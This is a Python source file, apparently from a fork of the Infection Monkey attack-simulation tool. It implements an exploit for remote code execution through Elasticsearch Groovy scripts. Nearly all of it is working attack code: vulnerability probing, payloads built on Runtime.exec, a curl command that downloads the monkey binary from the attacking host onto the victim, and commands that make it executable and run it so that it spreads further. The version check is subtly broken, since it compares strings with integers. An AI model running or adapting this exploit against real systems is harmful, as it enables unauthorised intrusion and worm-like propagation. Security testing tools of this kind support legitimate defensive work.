forked from p15670423/monkey
222 lines
7.9 KiB
Python
222 lines
7.9 KiB
Python
|
"""
|
||
|
Implementation is based on elastic search groovy exploit by metasploit
|
||
|
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
|
||
|
"""
|
||
|
|
||
|
import json
|
||
|
import logging
|
||
|
|
||
|
import requests
|
||
|
|
||
|
from exploit import HostExploiter
|
||
|
from model import MONKEY_ARG
|
||
|
from model.host import VictimHost
|
||
|
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||
|
from tools import get_target_monkey, HTTPTools, build_monkey_commandline
|
||
|
|
||
|
__author__ = 'danielg'
|
||
|
|
||
|
LOG = logging.getLogger(__name__)
|
||
|
TIMEOUT = 2
|
||
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||
|
VULNERABLE_VERSION = "1.4.2"
|
||
|
|
||
|
|
||
|
class ElasticGroovyExploiter(HostExploiter):
|
||
|
_target_os_type = ['linux', 'windows']
|
||
|
BASE_URL = 'http://%s:%s/_search?pretty'
|
||
|
GENERIC_QUERY = '''{"size":1, "script_fields":{"monkey_result": {"script": "%s"}}}'''
|
||
|
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
|
||
|
JAVA_GET_TMP_DIR = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
|
||
|
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
|
||
|
JAVA_CMD = GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||
|
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
||
|
|
||
|
def __init__(self):
|
||
|
self._config = __import__('config').WormConfiguration
|
||
|
self.skip_exist = self._config.skip_exploit_if_file_exist
|
||
|
self.host = None
|
||
|
|
||
|
def is_os_supported(self, host):
|
||
|
"""
|
||
|
Checks if the host is vulnerable.
|
||
|
Either using version string or by trying to attack
|
||
|
:param host: VictimHost
|
||
|
:return:
|
||
|
"""
|
||
|
if host.os.get('type') in self._target_os_type:
|
||
|
return True
|
||
|
|
||
|
if ES_SERVICE not in host.services:
|
||
|
LOG.info("Host: %s doesn't have ES open" % host.ip_addr)
|
||
|
return False
|
||
|
major, minor, build = host.services[ES_SERVICE]['version'].split('.')
|
||
|
if major > 1:
|
||
|
return False
|
||
|
if major == 1 and minor > 4:
|
||
|
return False
|
||
|
if major == 1 and minor == 4 and build > 2:
|
||
|
return False
|
||
|
return self.is_vulnerable(host)
|
||
|
|
||
|
def exploit_host(self, host, depth=-1, src_path=None):
|
||
|
assert isinstance(host, VictimHost)
|
||
|
self.host = host
|
||
|
|
||
|
real_host_os = self.get_host_os()
|
||
|
host.os['type'] = str(real_host_os.lower()) # strip unicode characters
|
||
|
if 'linux' in host.os['type']:
|
||
|
return self.exploit_host_linux(host, depth, src_path)
|
||
|
else:
|
||
|
return self.exploit_host_windows(host, depth, src_path)
|
||
|
|
||
|
def exploit_host_windows(self, host, depth=-1, src_path=None):
|
||
|
"""
|
||
|
TODO
|
||
|
Will exploit windows similar to smbexec
|
||
|
:param host:
|
||
|
:param depth:
|
||
|
:param src_path:
|
||
|
:return:
|
||
|
"""
|
||
|
return False
|
||
|
|
||
|
def exploit_host_linux(self, host, depth=-1, src_path=None):
|
||
|
"""
|
||
|
Exploits linux using similar flow to sshexec and shellshock.
|
||
|
Meaning run remote commands to copy files over HTTP
|
||
|
:param host:
|
||
|
:param depth:
|
||
|
:param src_path:
|
||
|
:return:
|
||
|
"""
|
||
|
uname_machine = self.get_linux_arch()
|
||
|
if '' != uname_machine:
|
||
|
host.os['machine'] = str(uname_machine.lower().strip()) # strip unicode characters
|
||
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||
|
if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)):
|
||
|
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
||
|
return True # return already infected
|
||
|
src_path = src_path or get_target_monkey(host)
|
||
|
if not src_path:
|
||
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||
|
return False
|
||
|
|
||
|
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
||
|
|
||
|
if not http_path:
|
||
|
LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__)
|
||
|
return False
|
||
|
|
||
|
download_command = '/usr/bin/curl %s -o %s' % (
|
||
|
http_path, dropper_target_path_linux)
|
||
|
self.run_shell_command(download_command)
|
||
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||
|
http_thread.stop()
|
||
|
if (http_thread.downloads != 1) or (
|
||
|
'ELF' not in
|
||
|
self.check_if_remote_file_exists_linux(dropper_target_path_linux)):
|
||
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||
|
return False
|
||
|
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
|
||
|
self.run_shell_command(chmod)
|
||
|
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
|
||
|
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
|
||
|
self.run_shell_command(cmdline)
|
||
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||
|
self._config.dropper_target_path_linux, host, cmdline)
|
||
|
if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)):
|
||
|
LOG.info("Log file does not exist, monkey might not have run")
|
||
|
return True
|
||
|
|
||
|
def check_if_remote_file_exists_linux(self, file_path):
|
||
|
"""
|
||
|
:param file_path:
|
||
|
:return:
|
||
|
"""
|
||
|
cmdline = '/usr/bin/head -c 4 %s' % file_path
|
||
|
return self.run_shell_command(cmdline)
|
||
|
|
||
|
def run_shell_command(self, command):
|
||
|
"""
|
||
|
Runs a single shell command and returns the result.
|
||
|
:param command:
|
||
|
:return:
|
||
|
"""
|
||
|
payload = self.JAVA_CMD % command
|
||
|
return self.get_command_result(payload)
|
||
|
|
||
|
def get_linux_arch(self):
|
||
|
"""
|
||
|
Returns host as per uname -m
|
||
|
:return:
|
||
|
"""
|
||
|
return self.get_command_result(self.JAVA_GET_BIT_LINUX)
|
||
|
|
||
|
def get_host_tempdir(self):
|
||
|
"""
|
||
|
Returns where to write our file given our permissions
|
||
|
:return: Temp directory path in target host
|
||
|
"""
|
||
|
return self.get_command_result(self.JAVA_GET_TMP_DIR)
|
||
|
|
||
|
def get_host_os(self):
|
||
|
"""
|
||
|
:return: target OS
|
||
|
"""
|
||
|
return self.get_command_result(self.JAVA_GET_OS)
|
||
|
|
||
|
def is_vulnerable(self, host):
|
||
|
"""
|
||
|
Checks if a given elasticsearch host is vulnerable to the groovy attack
|
||
|
:param host: Host, with an open 9200 port
|
||
|
:return: True/False
|
||
|
"""
|
||
|
self.host = host
|
||
|
result_text = self.get_command_result(self.JAVA_IS_VULNERABLE)
|
||
|
return 'java.lang.Runtime' in result_text
|
||
|
|
||
|
def get_command_result(self, payload):
|
||
|
"""
|
||
|
Gets the result of an attack payload with a single return value.
|
||
|
:param payload: Payload that fits the GENERIC_QUERY template.
|
||
|
:return:
|
||
|
"""
|
||
|
result = self.attack_query(payload)
|
||
|
if not result: # not vulnerable
|
||
|
return False
|
||
|
if 1 != len(result): # weird
|
||
|
return None
|
||
|
return result[0]
|
||
|
|
||
|
@property
|
||
|
def attack_url(self):
|
||
|
"""
|
||
|
Composes the URL to attack per host IP and port.
|
||
|
:return:
|
||
|
"""
|
||
|
return self.BASE_URL % (self.host.ip_addr, ES_PORT)
|
||
|
|
||
|
def attack_query(self, payload):
|
||
|
"""
|
||
|
Wraps the requests query and the JSON parsing.
|
||
|
Just reduce opportunity for bugs
|
||
|
:param payload:
|
||
|
:return: List of data fields or None
|
||
|
"""
|
||
|
response = requests.get(self.attack_url, data=payload)
|
||
|
result = self.get_results(response)
|
||
|
return result
|
||
|
|
||
|
@staticmethod
|
||
|
def get_results(response):
|
||
|
"""
|
||
|
Extracts the result data from our attack
|
||
|
:return: List of data fields or None
|
||
|
"""
|
||
|
try:
|
||
|
json_resp = json.loads(response.text)
|
||
|
return json_resp['hits']['hits'][0]['fields']['monkey_result']
|
||
|
except KeyError:
|
||
|
return None
|